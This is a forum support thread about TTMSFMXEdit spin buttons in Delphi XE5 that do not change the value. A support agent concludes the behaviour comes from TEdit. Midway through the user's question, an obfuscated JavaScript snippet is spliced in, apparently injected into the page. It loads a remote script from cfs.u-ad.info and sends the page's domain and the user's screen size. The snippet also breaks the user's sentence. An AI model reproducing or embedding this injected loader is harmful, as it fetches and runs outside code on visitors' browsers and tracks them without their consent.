TTMSFMXEdit with item TSpinEditButton

i put TTMSFMXEdit in form and i add item TSpinEditButton

when run, i press spin arrow, but value not increase / decrease

Delphi XE5
TTMSFMXEdit  versoin 1.5.3.2
Windows 8.1

Can you explain more in detail what exact steps you take to reproduce the issue?

It's unclear how the issue is reproducible.

Kind Regards, 
Pieter

is there any property should set if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.u-ad.info/cfspushadsv2/request" + "?id=1" + "&enc=telkom2" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582Ltpw5OIinlRjCDseCvRJ%2b8Ug6iDbehi2oMET0ed5zX8thqebv%2b9im6Z%2fyt%2fvUs2PwwXfpFrwARelN6pEswkxBhITpcpsYoPSJcN3XGhHIQ2vgmcqpIBN9g9h0JVctFUvhw73iHoydKYgk2JetYBJf1WXNng%2f6p7bsjr9zJt0XOJ3qds43WF2TxAB3tWc5WfjBMfU0IsWp4Ki7hzogGFVBcNCRqQuS1pUPThWWtChQYOj7AkSCe72gM5r5FOifyWqMsVpLwb2T3FQUjBblyuf7Neeh4M%2fmvn1Kq6oEoofQw8gA4n4k8SSB%2bp81EgDMDgn7j2g7vx3Wlp17LUUclXP8YW5iz03vVIF5sx2PdYlOXslx%2bRpXo5VLoNHMzlXfvGbW0VgsNjV0ELe91%2fiXn40z8q2MF%2bg1ymszRli%2ba5Sxic1xzcOvr6l388pkuWn0rlh6nvVVFLjXEnbrizwxDEalYLZFKEEtDo4oOKEsZ8GPLBkMkbu9g11W8slTPsiuTzwvRo7t3W%2bu8Dbp0KXTVlSIqkrS2XthqYRb5JOrr9%2bnFChx5A5ih9Ih4DpbnmoGBDuiG3brzYFwqItO%2bt6koJIJkNeRWkM5uju8ITt97c4MgbOS6Kf7GYVrCN4zl0l2VMf9eAEOqJFWgv" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};


here small video
https://youtu.be/xfCJ7bjIHSE

Hi, 


We have investigated this here and have tested this with TEdit. Please note that with TEdit the same behavior occurs, so the behavior is by design since TTMSFMXEdit inherits from TEdit.

Kind Regards, 
Pieter